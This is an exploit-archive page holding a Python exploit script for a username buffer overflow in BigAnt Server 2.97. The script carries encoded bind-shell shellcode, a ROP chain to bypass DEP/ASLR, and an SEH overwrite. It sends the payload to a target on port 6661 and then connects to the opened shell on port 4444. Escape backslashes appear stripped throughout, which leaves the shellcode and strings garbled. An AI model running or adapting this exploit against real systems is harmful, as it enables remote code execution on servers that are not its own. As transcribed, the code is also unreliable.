BigAnt Server 2.97 - DDNF Username Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BigAnt Server 2.97 - DDNF Username Buffer Overflow
# Published : 2013-04-10
# Author :
# Previous Title : DLink DIR-645 / DIR-815 diagnostic.php Command Execution
# Next Title : FreeFloat FTP 1.0 - DEP Bypass with ROP
#!/usr/bin/python
#Title: BigAnt Server 2.97 DDNF Username Buffer Overflow
#Author: Craig Freyman (@cd1zz) http://pwnag3.com
#Tested on: Windows 7 64 bit (DEP/ASLR Bypass)
#Similar Exploits: 
#http://www.exploit-db.com/exploits/24528/
#http://www.exploit-db.com/exploits/24527/
#http://www.exploit-db.com/exploits/22466/

import socket,os,struct,sys,subprocess,time

if len(sys.argv) < 2:
     print "[-]Usage: %s <target addr> " % sys.argv[0] + "r"
     sys.exit(0)

host = sys.argv[1]

#msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -b "x00x0ax0dx20x25x27" 
sc = (
"xd9xecxbax1fxafx04x2dxd9x74x24xf4x5dx2bxc9"
"xb1x56x31x55x18x03x55x18x83xc5x1bx4dxf1xd1"
"xcbx18xfax29x0bx7bx72xccx3axa9xe0x84x6ex7d"
"x62xc8x82xf6x26xf9x11x7axefx0ex92x31xc9x21"
"x23xf4xd5xeexe7x96xa9xecx3bx79x93x3ex4ex78"
"xd4x23xa0x28x8dx28x12xddxbax6dxaexdcx6cxfa"
"x8exa6x09x3dx7ax1dx13x6exd2x2ax5bx96x59x74"
"x7cxa7x8ex66x40xeexbbx5dx32xf1x6dxacxbbxc3"
"x51x63x82xebx5cx7dxc2xccxbex08x38x2fx43x0b"
"xfbx4dx9fx9ex1exf5x54x38xfbx07xb9xdfx88x04"
"x76xabxd7x08x89x78x6cx34x02x7fxa3xbcx50xa4"
"x67xe4x03xc5x3ex40xe2xfax21x2cx5bx5fx29xdf"
"x88xd9x70x88x7dxd4x8ax48xe9x6fxf8x7axb6xdb"
"x96x36x3fxc2x61x38x6axb2xfexc7x94xc3xd7x03"
"xc0x93x4fxa5x68x78x90x4axbdx2fxc0xe4x6dx90"
"xb0x44xddx78xdbx4ax02x98xe4x80x35x9ex2axf0"
"x16x49x4fx06x89xd5xc6xe0xc3xf5x8exbbx7bx34"
"xf5x73x1cx47xdfx2fxb5xdfx57x26x01xdfx67x6c"
"x22x4cxcfxe7xb0x9exd4x16xc7x8ax7cx50xf0x5d"
"xf6x0cxb3xfcx07x05x23x9cx9axc2xb3xebx86x5c"
"xe4xbcx79x95x60x51x23x0fx96xa8xb5x68x12x77"
"x06x76x9bxfax32x5cx8bxc2xbbxd8xffx9axedxb6"
"xa9x5cx44x79x03x37x3bxd3xc3xcex77xe4x95xce"
"x5dx92x79x7ex08xe3x86x4fxdcxe3xffxadx7cx0b"
"x2ax76x8cx46x76xdfx05x0fxe3x5dx48xb0xdexa2"
"x75x33xeax5ax82x2bx9fx5fxcexebx4cx12x5fx9e"
"x72x81x60x8b")

#rop chain generated with mona.py - www.corelan.be
rop_gadgets = ""
rop_gadgets += struct.pack('<L',0x0f9edaa9)	# POP EDX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0fa021cc)	# ptr to &VirtualProtect() [IAT expsrv.dll]
rop_gadgets += struct.pack('<L',0x0f9ea2a7)	# MOV ECX,DWORD PTR DS:[EDX] # SUB EAX,ECX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0f9e0214)	# PUSH ECX # SUB AL,5F # POP ESI # POP EBP # RETN 0x24 [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x0f9ee3d9)	# POP ECX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x0F9A5001)	# &Writable location 
rop_gadgets += struct.pack('<L',0x0f9f1e7c) # POP EDX # RETN  [expsrv.dll] 
rop_gadgets += struct.pack('<L',0xffffffff) # EDX starting value
for i in range(0,65): rop_gadgets += struct.pack('<L',0x0f9dbb5a)  # INC EDX # RETN ghetto style [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0f9e65b6) # POP EAX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0xfffffdff)	# Value to negate, will become 0x00000201
rop_gadgets += struct.pack('<L',0x0f9f2831) # NEG EAX # RETN [expsrv.dll]  
rop_gadgets += struct.pack('<L',0x0f9c5f4b) # POP EDI # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0FA0C001) # put this in edi so the nex one doesnt die, writable for edi
rop_gadgets += struct.pack('<L',0x0f9e2be0) # PUSH EAX # OR BYTE PTR DS:[EDI+5E],BL # POP EBX # POP EBP # RETN 0x08    ** [expsrv.dll]
rop_gadgets += struct.pack('<L',0x0f9e24f9) # push esp # ret 0x08 |  {PAGE_EXECUTE_READ} [expsrv.dll
rop_gadgets += struct.pack('<L',0x0f9c5f4b)	# POP EDI # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x0f9e5cd2)	# RETN (ROP NOP) [expsrv.dll]
rop_gadgets += struct.pack('<L',0x0f9c8a3e)	# POP EAX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x909006eb)	# nop with a ninja jump
rop_gadgets += struct.pack('<L',0x0f9f30c2)	# PUSHAD # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0f9e5cd2)	# RETN (ROP NOP) [expsrv.dll]

front = "A" * 684
seh = struct.pack('<L',0x0f9eeb8a) # ADD ESP,1004 [expsrv.dll]
back = "C" * 1592
stack_adjust = "x81xc4x24xfaxffxff"
junk = "D" * (4000 - (len(front) + len(seh) + len(back) + len(rop_gadgets) + len(stack_adjust) + len(sc))) 

sploit = front + seh + back + rop_gadgets + stack_adjust + sc + junk
print "[+] Sending pwnag3 to " + str(host)

try :
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host,6661))
	s.send(""
	"DDNF 17n"
	"classid: 100n"
	"cmdid: 1n"
	"objid: 1n"
	"rootid: 3n"
	"userid: 8n"
	"username: "+sploit+
	"rnrn")
	time.sleep(1)
except:
	print "[-] There was a problem"
	sys.exit()

print "[+] Getting your shell. "
time.sleep(3)
subprocess.Popen("telnet "+host+" 4444",shell=True).wait()
print"[*] Done." 
s.close()